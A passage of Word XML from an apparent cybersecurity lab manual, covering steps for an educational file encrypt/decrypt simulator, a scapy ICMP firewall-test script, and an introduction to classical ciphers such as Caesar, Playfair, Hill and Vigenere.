      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>directory,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run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B99574" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A76A04" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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ransomware_simulator.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B045B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B02D5ED" w14:textId="77777777" w:rsidR="00A16F47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line="275" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Choose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(„E‟)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encrypt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76D5A7C8" w14:textId="77777777" w:rsidR="00A16F47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line="275" w:lineRule="exact"/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again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decryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(„D‟)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restore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7D9296D1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB0D72B" w14:textId="77777777" w:rsidR="00A16F47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Verifying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Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3B8794" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="27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encrypt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folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CD1573" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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with decryption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original </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBCD112" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16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securely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decryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD4F6B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FCC9855" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2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56FCD443" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C67F0F2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16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Python script will encrypt and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>decrypt files 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provided </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A934F40" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="467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ransomware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cybersecurity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00543434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35C5F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="81" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="1807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analyzes blocked/allowed responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DB8C2B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089D25D1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360" w:right="783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analyzes blocked/allowed responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC06E63" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64578CED" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pP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Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC64C73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274"/>
        <w:ind w:left="108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3.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F7DE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080"/>
        </w:tabs>
        <w:spacing w:before="10"/>
        <w:ind w:left="1080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scapy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24"/>
        </w:rPr>
        <w:t>library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packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3E654E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C13F5F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000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C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA8F7C7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="62"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C366615" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:right="8033" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Install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0"/>
        </w:rPr>
        <w:t>scapy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pip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scapy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF716D6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="50"/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 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packets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B33D619" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA96C6E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000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scapy.all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*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B16871" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75007E88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test_firewall(destination_ip):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F030C30" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="840" w:right="3449"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print(f"Sending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packet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{destination_ip}") packet = IP(dst=destination_ip)/ICMP()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F74CC1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225" w:lineRule="exact"/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response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sr1(packet,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timeout=2,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verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04484E40" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EEA153" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="84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response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AFD035" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="1143" w:firstLine="479"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("Packet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Allowed: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Firewall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blocking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ICMP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requests.") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D3600A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225" w:lineRule="exact"/>
        <w:ind w:left="1320"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("Packet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Blocked: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Firewall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blocking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ICMP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requests.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081830DC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23171781" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000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 xml:space="preserve"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ED7074" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="2222"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>target_ip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target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IP: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") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>test_firewall(target_ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFFDBA4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449A2A0C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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694BF7C8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226DA34D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2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Outcome:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631E8D2C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="275"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Identifies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>whether ICMP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blocked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firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261AC6C6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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rules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configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C486215" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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E7BCC3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6"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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encryption,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substitution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techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68414580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800"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="293" w:lineRule="exact"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ceaser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B143656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800"/>
        </w:tabs>
        <w:spacing w:line="293" w:lineRule="exact"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Playfair</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41755E3A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800"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="293" w:lineRule="exact"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EACC0D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800"/>
        </w:tabs>
        <w:spacing w:line="293" w:lineRule="exact"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Vigenere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546FF0C5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:ind w:left="534" w:right="532"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>26a).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Encryption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Decryption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Using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Ceaser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Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65749386" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="242"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444C7357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43F1AD84" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="242"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Ceaser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A83C9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="49"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BE7FE7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHMS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523D7824" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B36D1E6" w14:textId="77777777" w:rsidR="00A16F47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line="232" w:lineRule="auto"/>
        <w:ind w:right="1989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Ceaser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cipher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plaintext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replaced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fixed number of positions down the alphabet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F2FB6" w14:textId="77777777" w:rsidR="00A16F47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before="10" w:line="232" w:lineRule="auto"/>
        <w:ind w:right="1455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example,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shift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replaced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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, and so on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447613B6" w14:textId="77777777" w:rsidR="00A16F47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before="13" w:line="232" w:lineRule="auto"/>
        <w:ind w:right="737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letters into numbers, according to the scheme, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A = 0, B = 1, Z = 25.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF089C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1386"/>
        </w:tabs>
        <w:spacing w:before="5"/>
        <w:ind w:left="1386" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Encryption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letter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>x 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shift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described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mathematically </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>as,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0759F3D6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="201"/>
        <w:ind w:left="4100"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>En(x)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= (x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>+ n)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mod26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EBFDD6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="41"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Decryption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similarly,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1875B65A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="4162"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Dn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(x)=(x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n)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pacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mod26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E14DFB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="82"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C798FFB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E9560BC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63ACC9E3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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CaesarCipher.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C9EF24" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
